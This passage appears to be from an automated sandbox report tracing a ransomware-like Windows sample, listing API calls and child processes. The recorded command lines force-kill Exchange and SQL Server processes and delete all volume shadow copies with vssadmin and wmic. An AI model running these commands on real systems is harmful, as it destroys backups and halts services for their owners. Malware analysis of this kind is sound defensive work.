_String2="ECHO") returned 18 [0094.203] _wcsicmp (_String1="wbadmin", _String2="SET") returned 4 [0094.203] _wcsicmp (_String1="wbadmin", _String2="PAUSE") returned 7 [0094.203] _wcsicmp (_String1="wbadmin", _String2="DATE") returned 19 [0094.203] _wcsicmp (_String1="wbadmin", _String2="TIME") returned 3 [0094.203] _wcsicmp (_String1="wbadmin", _String2="PROMPT") returned 7 [0094.203] _wcsicmp (_String1="wbadmin", _String2="MD") returned 10 [0094.203] _wcsicmp (_String1="wbadmin", _String2="MKDIR") returned 10 [0094.203] _wcsicmp (_String1="wbadmin", _String2="RD") returned 5 [0094.203] _wcsicmp (_String1="wbadmin", _String2="RMDIR") returned 5 [0094.203] _wcsicmp (_String1="wbadmin", _String2="PATH") returned 7 [0094.203] _wcsicmp (_String1="wbadmin", _String2="GOTO") returned 16 [0094.203] _wcsicmp (_String1="wbadmin", _String2="SHIFT") returned 4 [0094.203] _wcsicmp (_String1="wbadmin", _String2="CLS") returned 20 [0094.203] _wcsicmp (_String1="wbadmin", _String2="CALL") returned 20 [0094.204] _wcsicmp (_String1="wbadmin", _String2="VERIFY") returned 1 [0094.204] _wcsicmp (_String1="wbadmin", _String2="VER") returned 1 [0094.204] _wcsicmp (_String1="wbadmin", _String2="VOL") returned 1 [0094.204] _wcsicmp (_String1="wbadmin", _String2="EXIT") returned 18 [0094.204] _wcsicmp (_String1="wbadmin", _String2="SETLOCAL") returned 4 [0094.204] _wcsicmp (_String1="wbadmin", _String2="ENDLOCAL") returned 18 [0094.204] _wcsicmp (_String1="wbadmin", _String2="TITLE") returned 3 [0094.204] _wcsicmp (_String1="wbadmin", _String2="START") returned 4 [0094.204] _wcsicmp (_String1="wbadmin", _String2="DPATH") returned 19 [0094.204] _wcsicmp (_String1="wbadmin", _String2="KEYS") returned 12 [0094.204] _wcsicmp (_String1="wbadmin", _String2="MOVE") returned 10 [0094.204] _wcsicmp (_String1="wbadmin", _String2="PUSHD") returned 7 [0094.204] _wcsicmp (_String1="wbadmin", _String2="POPD") returned 7 [0094.204] _wcsicmp (_String1="wbadmin", _String2="ASSOC") returned 22 [0094.204] _wcsicmp (_String1="wbadmin", _String2="FTYPE") returned 17 [0094.204] _wcsicmp (_String1="wbadmin", _String2="BREAK") returned 21 [0094.204] _wcsicmp (_String1="wbadmin", _String2="COLOR") returned 20 [0094.204] _wcsicmp (_String1="wbadmin", _String2="MKLINK") returned 10 [0094.205] _wcsicmp (_String1="wbadmin", _String2="DIR") returned 19 [0094.205] _wcsicmp (_String1="wbadmin", _String2="ERASE") returned 18 [0094.205] _wcsicmp (_String1="wbadmin", _String2="DEL") returned 19 [0094.205] _wcsicmp (_String1="wbadmin", _String2="TYPE") returned 3 [0094.205] _wcsicmp (_String1="wbadmin", _String2="COPY") returned 20 [0094.205] _wcsicmp (_String1="wbadmin", _String2="CD") returned 20 [0094.205] _wcsicmp (_String1="wbadmin", _String2="CHDIR") returned 20 [0094.205] _wcsicmp (_String1="wbadmin", _String2="RENAME") returned 5 [0094.205] _wcsicmp (_String1="wbadmin", _String2="REN") returned 5 [0094.205] _wcsicmp (_String1="wbadmin", _String2="ECHO") returned 18 [0094.205] _wcsicmp (_String1="wbadmin", _String2="SET") returned 4 [0094.205] _wcsicmp (_String1="wbadmin", _String2="PAUSE") returned 7 [0094.205] _wcsicmp (_String1="wbadmin", _String2="DATE") returned 19 [0094.205] _wcsicmp (_String1="wbadmin", _String2="TIME") returned 3 [0094.205] _wcsicmp (_String1="wbadmin", _String2="PROMPT") returned 7 [0094.205] _wcsicmp (_String1="wbadmin", _String2="MD") returned 10 [0094.205] _wcsicmp (_String1="wbadmin", _String2="MKDIR") returned 10 [0094.205] _wcsicmp (_String1="wbadmin", _String2="RD") returned 5 [0094.205] _wcsicmp (_String1="wbadmin", _String2="RMDIR") returned 5 [0094.206] _wcsicmp (_String1="wbadmin", _String2="PATH") returned 7 [0094.206] _wcsicmp (_String1="wbadmin", _String2="GOTO") returned 16 [0094.206] _wcsicmp (_String1="wbadmin", _String2="SHIFT") returned 4 [0094.206] _wcsicmp (_String1="wbadmin", _String2="CLS") returned 20 [0094.206] _wcsicmp (_String1="wbadmin", _String2="CALL") returned 20 [0094.206] _wcsicmp (_String1="wbadmin", _String2="VERIFY") returned 1 [0094.206] _wcsicmp (_String1="wbadmin", _String2="VER") returned 1 [0094.206] _wcsicmp (_String1="wbadmin", _String2="VOL") returned 1 [0094.206] _wcsicmp (_String1="wbadmin", _String2="EXIT") returned 18 [0094.206] _wcsicmp (_String1="wbadmin", _String2="SETLOCAL") returned 4 [0094.206] _wcsicmp (_String1="wbadmin", _String2="ENDLOCAL") returned 18 [0094.206] _wcsicmp (_String1="wbadmin", _String2="TITLE") returned 3 [0094.206] _wcsicmp (_String1="wbadmin", _String2="START") returned 4 [0094.206] _wcsicmp (_String1="wbadmin", _String2="DPATH") returned 19 [0094.206] _wcsicmp (_String1="wbadmin", _String2="KEYS") returned 12 [0094.206] _wcsicmp (_String1="wbadmin", _String2="MOVE") returned 10 [0094.206] _wcsicmp (_String1="wbadmin", _String2="PUSHD") returned 7 [0094.206] _wcsicmp (_String1="wbadmin", _String2="POPD") returned 7 [0094.206] _wcsicmp (_String1="wbadmin", _String2="ASSOC") returned 22 [0094.207] _wcsicmp (_String1="wbadmin", _String2="FTYPE") returned 17 [0094.207] _wcsicmp (_String1="wbadmin", _String2="BREAK") returned 21 [0094.207] _wcsicmp (_String1="wbadmin", _String2="COLOR") returned 20 [0094.207] _wcsicmp (_String1="wbadmin", _String2="MKLINK") returned 10 [0094.207] _wcsicmp (_String1="wbadmin", _String2="FOR") returned 17 [0094.207] _wcsicmp (_String1="wbadmin", _String2="IF") returned 14 [0094.207] _wcsicmp (_String1="wbadmin", _String2="REM") returned 5 [0094.208] GetProcessHeap () returned 0x6f0000 [0094.208] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x210) returned 0x703070 [0094.208] GetProcessHeap () returned 0x6f0000 [0094.208] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x46) returned 0x703288 [0094.208] _wcsnicmp (_String1="wbad", _String2="cmd ", _MaxCount=0x4) returned 20 [0094.208] GetProcessHeap () returned 0x6f0000 [0094.209] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x418) returned 0x6f07f0 [0094.209] SetErrorMode (uMode=0x0) returned 0x0 [0094.209] SetErrorMode (uMode=0x1) returned 0x0 [0094.209] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x6f07f8, lpFilePart=0x32f3e8 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x32f3e8*="Desktop") returned 0x25 [0094.209] SetErrorMode (uMode=0x0) returned 0x1 [0094.210] GetProcessHeap () returned 0x6f0000 [0094.210] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x6f07f0, Size=0x64) returned 0x6f07f0 [0094.210] GetProcessHeap () returned 0x6f0000 [0094.210] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x6f07f0) returned 0x64 [0094.210] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49eb0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0094.210] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0094.210] GetProcessHeap () returned 0x6f0000 [0094.210] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x120) returned 0x7032d8 [0094.210] GetProcessHeap () returned 0x6f0000 [0094.210] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x238) returned 0x6f0860 [0094.224] GetProcessHeap () returned 0x6f0000 [0094.224] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x6f0860, Size=0x122) returned 0x6f0860 [0094.224] GetProcessHeap () returned 0x6f0000 [0094.224] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x6f0860) returned 0x122 [0094.224] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49eb0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0094.224] GetProcessHeap () returned 0x6f0000 [0094.224] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0xe0) returned 0x703400 [0094.232] _get_osfhandle (_FileHandle=2) returned 0xb [0094.232] GetFileType (hFile=0xb) returned 0x2 [0094.233] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0094.233] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x32f5b8 | out: lpMode=0x32f5b8) returned 1 [0094.233] _get_osfhandle (_FileHandle=2) returned 0xb [0094.233] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x32f5ec | out: lpConsoleScreenBufferInfo=0x32f5ec) returned 1 [0094.234] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2331, dwLanguageId=0x0, lpBuffer=0x49eb4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="'%1' is not recognized as an internal or external command,\r\noperable program or batch file.\r\n") returned 0x5d [0094.235] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x49eb4640*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0x32f610, lpReserved=0x0 | out: lpBuffer=0x49eb4640*, lpNumberOfCharsWritten=0x32f610*=0x62) returned 1 [0094.494] _get_osfhandle (_FileHandle=1) returned 0x7 [0094.494] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0094.494] _get_osfhandle (_FileHandle=1) returned 0x7 [0094.494] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49ea41ac | out: lpMode=0x49ea41ac) returned 1 [0094.495] _get_osfhandle (_FileHandle=0) returned 0x3 [0094.495] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49ea41b0 | out: lpMode=0x49ea41b0) returned 1 [0094.495] SetConsoleInputExeNameW () returned 0x1 [0094.495] GetConsoleOutputCP () returned 0x1b5 [0094.496] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49ea4260 | out: lpCPInfo=0x49ea4260) returned 1 [0094.496] SetThreadUILanguage (LangId=0x0) returned 0x409 [0094.496] exit (_Code=1) Process: id = "33" image_name = "taskkill.exe" filename = "c:\\windows\\syswow64\\taskkill.exe" page_root = "0x3bd14000" os_pid = "0x7e4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "21" os_parent_pid = "0xac4" cmd_line = "taskkill /f /im MSExchange*" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 120 os_tid = 0x71c Thread: id = 158 os_tid = 0xda0 Thread: id = 164 os_tid = 0xdc0 Thread: id = 173 os_tid = 0xde8 Thread: id = 174 os_tid = 0xdec Process: id = "34" image_name = "taskkill.exe" filename = "c:\\windows\\syswow64\\taskkill.exe" page_root = "0x3b419000" os_pid = "0x834" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "21" os_parent_pid = "0xac4" cmd_line = "taskkill /f /im Microsoft.Exchange.*" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 121 os_tid = 0x854 Thread: id = 156 os_tid = 0xd98 Thread: id = 161 os_tid = 0xdac Thread: id = 169 os_tid = 0xdd4 Thread: id = 170 os_tid = 0xdd8 Process: id = "35" image_name = "taskkill.exe" filename = "c:\\windows\\syswow64\\taskkill.exe" page_root = "0x3a71e000" os_pid = "0xc2c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "21" os_parent_pid = "0xac4" cmd_line = "taskkill /f /im sqlserver.exe" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 122 os_tid = 0xc30 Thread: id = 157 os_tid = 0xd9c Thread: id = 163 os_tid = 0xdb8 Thread: id = 171 os_tid = 0xddc Thread: id = 172 os_tid = 0xde0 Process: id = "36" image_name = "taskkill.exe" filename = "c:\\windows\\syswow64\\taskkill.exe" page_root = "0x3b323000" os_pid = "0xc3c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "21" os_parent_pid = "0xac4" cmd_line = "taskkill /f /im sqlwriter.exe" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 123 os_tid = 0xc40 Thread: id = 155 os_tid = 0xd94 Thread: id = 160 os_tid = 0xda8 Thread: id = 166 os_tid = 0xdc8 Thread: id = 167 os_tid = 0xdcc Process: id = "37" image_name = "vssvc.exe" filename = "c:\\windows\\system32\\vssvc.exe" page_root = "0x3b318000" os_pid = "0x954" os_integrity_level = "0x4000" os_privileges = "0xe60b7e890" monitor_reason = "rpc_server" parent_id = "19" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\vssvc.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\VSS" [0xe], "NT AUTHORITY\\Logon Session 00000000:0005bc9c" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 137 os_tid = 0xcdc Thread: id = 138 os_tid = 0xc88 Thread: id = 139 os_tid = 0xc80 Thread: id = 140 os_tid = 0xc74 Thread: id = 141 os_tid = 0xc70 Thread: id = 142 os_tid = 0xc68 Thread: id = 143 os_tid = 0x7c8 Thread: id = 239 os_tid = 0xf84 Process: id = "38" image_name = "vssadmin.exe" filename = "c:\\windows\\syswow64\\vssadmin.exe" page_root = "0x368e9000" os_pid = "0xd84" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "30" os_parent_pid = "0xb1c" cmd_line = "vssadmin delete shadows /all /quiet" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 154 os_tid = 0xd88 Thread: id = 159 os_tid = 0xda4 Thread: id = 165 os_tid = 0xdc4 Thread: id = 175 os_tid = 0xdf0 Thread: id = 176 os_tid = 0xdf4 Process: id = "39" image_name = "wmic.exe" filename = "c:\\windows\\syswow64\\wbem\\wmic.exe" page_root = "0x362eb000" os_pid = "0xdb0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "31" os_parent_pid = "0x5bc" cmd_line = "wmic shadowcopy delete" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 162 os_tid = 0xdb4 [0095.020] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14fc4c | out: lpSystemTimeAsFileTime=0x14fc4c*(dwLowDateTime=0x26858da0, dwHighDateTime=0x1d62227)) [0095.021] GetCurrentProcessId () returned 0xdb0 [0095.021] GetCurrentThreadId () returned 0xdb4 [0095.021] GetTickCount () returned 0x114e8e9 [0095.021] QueryPerformanceCounter (in: lpPerformanceCount=0x14fc44 | out: lpPerformanceCount=0x14fc44*=21497610144) returned 1 [0095.022] GetModuleHandleA (lpModuleName=0x0) returned 0xa90000 [0095.132] __set_app_type (_Type=0x1) [0095.132] __p__fmode () returned 0x770331f4 [0095.132] __p__commode () returned 0x770331fc [0095.132] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xacdc15) returned 0x0 [0095.133] __wgetmainargs (in: _Argc=0xadc5e8, _Argv=0xadc5f0, _Env=0xadc5ec, _DoWildCard=0, _StartInfo=0xadc5fc | out: _Argc=0xadc5e8, _Argv=0xadc5f0, _Env=0xadc5ec) returned 0 [0095.135] ??0CHString@@QAE@XZ () returned 0xadc28c [0095.135] malloc (_Size=0x18) returned 0x2713b8 [0095.135] malloc (_Size=0x38) returned 0x2713d8 [0095.135] malloc (_Size=0x28) returned 0x273dc8 [0095.135] malloc (_Size=0x18) returned 0x273df8 [0095.136] malloc (_Size=0x24) returned 0x273e18 [0095.136] malloc (_Size=0x18) returned 0x273e48 [0095.136] malloc (_Size=0x18) returned 0x273e68 [0095.136] ??0CHString@@QAE@XZ () returned 0xadc594 [0095.136] malloc (_Size=0x18) returned 0x273e88 [0095.136] ?Empty@CHString@@QAEXXZ () returned 0x75330504 [0095.136] SetConsoleCtrlHandler (HandlerRoutine=0xac6b6f, Add=1) returned 1 [0095.136] _onexit (_Func=0xad2f1f) returned 0xad2f1f [0095.137] _onexit (_Func=0xad2f2e) returned 0xad2f2e [0095.137] _onexit (_Func=0xad2f42) returned 0xad2f42 [0095.137] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0095.137] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0095.139] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0095.509] CoCreateInstance (in: rclsid=0xa96c60*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xa96b90*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0xadc1b0 | out: ppv=0xadc1b0*=0xa50828) returned 0x0 [0095.525] GetCurrentProcess () returned 0xffffffff [0095.525] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x14faf4 | out: TokenHandle=0x14faf4*=0x108) returned 1 [0095.525] GetTokenInformation (in: TokenHandle=0x108, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x14faf0 | out: TokenInformation=0x0, ReturnLength=0x14faf0) returned 0 [0095.525] malloc (_Size=0x118) returned 0x272788 [0095.525] GetTokenInformation (in: TokenHandle=0x108, TokenInformationClass=0x3, TokenInformation=0x272788, TokenInformationLength=0x118, ReturnLength=0x14faf0 | out: TokenInformation=0x272788, ReturnLength=0x14faf0) returned 1 [0095.525] AdjustTokenPrivileges (in: TokenHandle=0x108, DisableAllPrivileges=0, NewState=0x272788*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0095.525] free (_Block=0x272788) [0095.525] CloseHandle (hObject=0x108) returned 1 [0095.526] malloc (_Size=0x40) returned 0x272788 [0095.526] malloc (_Size=0x40) returned 0x2727d0 [0095.526] malloc (_Size=0x40) returned 0x272818 [0095.526] malloc (_Size=0x20a) returned 0x272860 [0095.526] GetSystemDirectoryW (in: lpBuffer=0x272860, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0095.526] free (_Block=0x272860) [0095.527] malloc (_Size=0xc) returned 0x273fb8 [0095.527] malloc (_Size=0xc) returned 0x273fd0 [0095.527] malloc (_Size=0xc) returned 0x272860 [0095.527] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0095.527] SysStringLen (param_1="\\kernel32.dll") returned 0xd [0095.527] free (_Block=0x273fb8) [0095.527] free (_Block=0x273fd0) [0095.527] LoadLibraryW (lpLibFileName="C:\\Windows\\system32\\kernel32.dll") returned 0x76d30000 [0095.528] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0095.529] SetThreadUILanguage (LangId=0x0) returned 0x409 [0095.529] FreeLibrary (hLibModule=0x76d30000) returned 1 [0095.530] free (_Block=0x272860) [0095.530] _vsnwprintf (in: _Buffer=0x272818, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0x14fa50 | out: _Buffer="ms_409") returned 6 [0095.530] malloc (_Size=0x20) returned 0x273fb8 [0095.530] GetComputerNameW (in: lpBuffer=0x273fb8, nSize=0x14faa8 | out: lpBuffer="XDUWTFONO", nSize=0x14faa8) returned 1 [0095.531] lstrlenW (lpString="XDUWTFONO") returned 9 [0095.531] malloc (_Size=0x14) returned 0x272860 [0095.531] lstrlenW (lpString="XDUWTFONO") returned 9 [0095.531] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0x14fae4 | out: lpNameBuffer=0x0, nSize=0x14fae4) returned 0x0 [0095.533] GetLastError () returned 0xea [0095.533] malloc (_Size=0x40) returned 0x272880 [0095.533] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x272880, nSize=0x14fae4 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x14fae4) returned 0x1 [0095.533] lstrlenW (lpString="") returned 0 [0095.533] lstrlenW (lpString="XDUWTFONO") returned 9 [0095.533] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0095.537] lstrlenW (lpString=".") returned 1 [0095.537] lstrlenW (lpString="XDUWTFONO") returned 9 [0095.537] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2=".", cchCount2=1) returned 3 [0095.537] lstrlenW (lpString="LOCALHOST") returned 9 [0095.537] lstrlenW (lpString="XDUWTFONO") returned 9 [0095.537] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="LOCALHOST", cchCount2=9) returned 3 [0095.538] lstrlenW (lpString="XDUWTFONO") returned 9 [0095.538] lstrlenW (lpString="XDUWTFONO") returned 9 [0095.538] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="XDUWTFONO", cchCount2=9) returned 2 [0095.538] free (_Block=0x272860) [0095.538] lstrlenW (lpString="XDUWTFONO") returned 9 [0095.538] malloc (_Size=0x14) returned 0x272860 [0095.538] lstrlenW (lpString="XDUWTFONO") returned 9 [0095.538] lstrlenW (lpString="XDUWTFONO") returned 9 [0095.538] malloc (_Size=0x14) returned 0x2728c8 [0095.538] lstrlenW (lpString="XDUWTFONO") returned 9 [0095.538] malloc (_Size=0x4) returned 0x2728e8 [0095.538] malloc (_Size=0xc) returned 0x2728f8 [0095.538] malloc (_Size=0x18) returned 0x272910 [0095.539] malloc (_Size=0xc) returned 0x272930 [0095.539] SysStringLen (param_1="IDENTIFY") returned 0x8 [0095.539] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0095.539] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0095.539] SysStringLen (param_1="IDENTIFY") returned 0x8 [0095.539] malloc (_Size=0x18) returned 0x272948 [0095.539] malloc (_Size=0xc) returned 0x272968 [0095.539] SysStringLen (param_1="IMPERSONATE") returned 0xb [0095.539] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0095.539] SysStringLen (param_1="IMPERSONATE") returned 0xb [0095.539] SysStringLen (param_1="IDENTIFY") returned 0x8 [0095.539] SysStringLen (param_1="IDENTIFY") returned 0x8 [0095.540] SysStringLen (param_1="IMPERSONATE") returned 0xb [0095.540] malloc (_Size=0x18) returned 0x272980 [0095.540] malloc (_Size=0xc) returned 0x2729a0 [0095.540] SysStringLen (param_1="DELEGATE") returned 0x8 [0095.540] SysStringLen (param_1="IDENTIFY") returned 0x8 [0095.540] SysStringLen (param_1="DELEGATE") returned 0x8 [0095.540] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0095.540] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0095.540] SysStringLen (param_1="DELEGATE") returned 0x8 [0095.540] malloc (_Size=0x18) returned 0x2729b8 [0095.540] malloc (_Size=0xc) returned 0x2729d8 [0095.540] malloc (_Size=0x18) returned 0x2729f0 [0095.541] malloc (_Size=0xc) returned 0x272a10 [0095.541] SysStringLen (param_1="NONE") returned 0x4 [0095.541] SysStringLen (param_1="DEFAULT") returned 0x7 [0095.541] SysStringLen (param_1="DEFAULT") returned 0x7 [0095.541] SysStringLen (param_1="NONE") returned 0x4 [0095.541] malloc (_Size=0x18) returned 0x272a28 [0095.541] malloc 